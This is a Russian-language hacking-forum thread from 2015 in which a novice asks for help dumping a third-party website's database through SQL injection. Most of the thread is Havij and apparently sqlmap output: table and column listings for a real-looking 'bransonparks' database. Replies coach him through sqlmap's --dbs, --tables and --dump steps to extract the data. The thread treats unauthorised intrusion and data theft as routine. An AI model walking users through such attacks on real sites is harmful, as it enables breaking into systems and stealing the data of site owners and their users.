ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.08.2015, 21:45
|
|
Новичок
Регистрация: 07.08.2015
Сообщений: 27
Провел на форуме:
8824
Репутация:
0
|
|
Здравствуйте, форумчани, сегодня решил слить один сайтик, я уже наперёд проверил что Sql эксплуатируется, вбил в havij, проверил! Выдал следующее..
Current DB: bransonparks
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x6272616E736F6E7061726B73 is 35
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x6272616E736F6E7061726B73 is 35
При отметке единственной таблицы bransonparks и нажатии на Get DBs не произошло никакой реакции, я нажал на Get Tables, он выдал
Table found: ads
Table found: categories
Table found: domains
Table found: events
Table found: gallery
Table found: home
Table found: keywords
Table found: link_keyword0
Table found: link_keyword1
Table found: link_keyword2
Table found: link_keyword3
Table found: link_keyword4
Table found: link_keyword5
Table found: link_keyword6
Table found: link_keyword7
Table found: link_keyword8
Table found: link_keyword9
Table found: link_keyworda
Table found: link_keywordb
Table found: link_keywordc
Table found: link_keywordd
Table found: link_keyworde
Table found: link_keywordf
Table found: links
Table found: pages
Table found: parks
Table found: pending
Table found: query_log
Table found: schedule
Table found: site_category
Table found: sites
Table found: slideshow
Table found: sports
Table found: temp
Table found: tournaments
и на этом вся радость закончилась, дальше пробывал выделив столбы жмякать на Get Columns но никакой реакции, подскажите что не так делаю.
|
|
|
07.08.2015, 22:17
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
|
|
|
|
07.08.2015, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
На-ка вот тебе колумнс
Код:
Database: bransonparks
Table: links
[11 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| level | int(11) |
| size | float |
| description | varchar(255) |
| fulltxt | mediumtext |
| indexdate | date |
| link_id | int(11) |
| md5sum | varchar(32) |
| site_id | int(11) |
| title | varchar(200) |
| url | varchar(255) |
| visible | int(11) |
+-------------+--------------+
Database: bransonparks
Table: link_keyword1
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword0
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword3
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword2
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword5
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword4
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword7
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword6
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyword9
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: home
[3 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| id | int(11) |
| maincontent | text |
| parkblurb | text |
+-------------+---------+
Database: bransonparks
Table: ads
[12 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| address | text |
| big_ad | int(11) |
| category | text |
| city | text |
| id | int(11) |
| link | text |
| logo | text |
| name | text |
| phone | varchar(20) |
| phone2 | varchar(20) |
| state | text |
| zip | text |
+----------+-------------+
Database: bransonparks
Table: link_keywordf
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: sites
[9 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| can_leave_domain | tinyint(1) |
| disallowed | text |
| indexdate | date |
| required | text |
| short_desc | text |
| site_id | int(11) |
| spider_depth | int(11) |
| title | varchar(255) |
| url | varchar(255) |
+------------------+--------------+
Database: bransonparks
Table: parks
[7 columns]
+---------+------------+
| Column | Type |
+---------+------------+
| content | text |
| id | tinyint(4) |
| image1 | text |
| image2 | text |
| image3 | text |
| image4 | text |
| name | text |
+---------+------------+
Database: bransonparks
Table: sports
[8 columns]
+---------+------------+
| Column | Type |
+---------+------------+
| age | tinyint(4) |
| content | text |
| id | int(11) |
| image1 | text |
| image2 | text |
| image3 | text |
| image4 | text |
| title | text |
+---------+------------+
Database: bransonparks
Table: link_keyword8
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: tournaments
[5 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| content | text |
| content2 | text |
| content3 | text |
| content4 | text |
| id | int(11) |
+----------+---------+
Database: bransonparks
Table: events
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| blurb | text |
| id | int(11) |
+--------+---------+
Database: bransonparks
Table: pending
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| count | int(11) |
| level | int(11) |
| num | int(11) |
| site_id | int(11) |
| temp_id | varchar(32) |
+---------+-------------+
Database: bransonparks
Table: link_keyworda
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: site_category
[2 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| category_id | int(11) |
| site_id | int(11) |
+-------------+---------+
Database: bransonparks
Table: link_keywordc
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keywordb
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keyworde
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: link_keywordd
[4 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| domain | int(4) |
| keyword_id | int(11) |
| link_id | int(11) |
| weight | int(3) |
+------------+---------+
Database: bransonparks
Table: schedule
[2 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| content | int(11) |
| id | int(11) |
+---------+---------+
Database: bransonparks
Table: gallery
[4 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| alt_text | text |
| filename | text |
| id | int(11) |
| page_id | text |
+----------+---------+
Database: bransonparks
Table: slideshow
[3 columns]
+---------+------------+
| Column | Type |
+---------+------------+
| caption | text |
| id | tinyint(4) |
| image | text |
+---------+------------+
Database: bransonparks
Table: pages
[9 columns]
+-----------+------------+
| Column | Type |
+-----------+------------+
| content | text |
| gallery | int(11) |
| id | tinyint(4) |
| image1 | text |
| image2 | text |
| image3 | text |
| image4 | text |
| parent_id | tinyint(4) |
| title | text |
+-----------+------------+
Database: bransonparks
Table: categories
[3 columns]
+-------------+---------+
| Column | Type |
+-------------+---------+
| category | text |
| category_id | int(11) |
| parent_num | int(11) |
+-------------+---------+
Database: bransonparks
Table: temp
[3 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| level | int(11) |
| id | varchar(32) |
| link | varchar(255) |
+--------+--------------+
Database: bransonparks
Table: keywords
[2 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| keyword | varchar(30) |
| keyword_id | int(11) |
+------------+-------------+
Database: bransonparks
Table: query_log
[4 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| time | timestamp |
| elapsed | float |
| query | varchar(255) |
| results | int(11) |
+---------+--------------+
Database: bransonparks
Table: domains
[2 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| domain | varchar(255) |
| domain_id | int(11) |
+-----------+--------------+
|
|
|
|
08.08.2015, 14:50
|
|
Новичок
Регистрация: 07.08.2015
Сообщений: 27
Провел на форуме:
8824
Репутация:
0
|
|
посоветуйте что,то посвежее
хотя вроде хавич последней версии.
|
|
|
|
08.08.2015, 14:55
|
|
Новичок
Регистрация: 07.08.2015
Сообщений: 27
Провел на форуме:
8824
Репутация:
0
|
|
Какой версией не пробую, тоже самое.
|
|
|
|
08.08.2015, 15:01
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
|
|
|
|
08.08.2015, 15:03
|
|
Новичок
Регистрация: 07.08.2015
Сообщений: 27
Провел на форуме:
8824
Репутация:
0
|
|
|
|
|
|
08.08.2015, 21:45
|
|
Новичок
Регистрация: 07.08.2015
Сообщений: 27
Провел на форуме:
8824
Репутация:
0
|
|
теперь после проверки, у меня в Документах в папке .sqlmap/output/название сайта/ создалось три файла "log", "session.sqlite", target.txt что это мне даёт?
|
|
|
|
08.08.2015, 21:48
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от SQL Hack
SQL Hack said:
↑
теперь после проверки, у меня в Документах в папке .sqlmap/output/название сайта/ создалось три файла "log", "session.sqlite", target.txt что это мне даёт? Да это файл лога сессии и цели. Они просто логируют. Пиши вначале --dbs получишь список баз,потом -D название базы --tables получаешь таблицы ,потом дописываешь --dump и сливаешь.
|
|
|
|
08.08.2015, 22:19
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Выше все твои поля указал...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
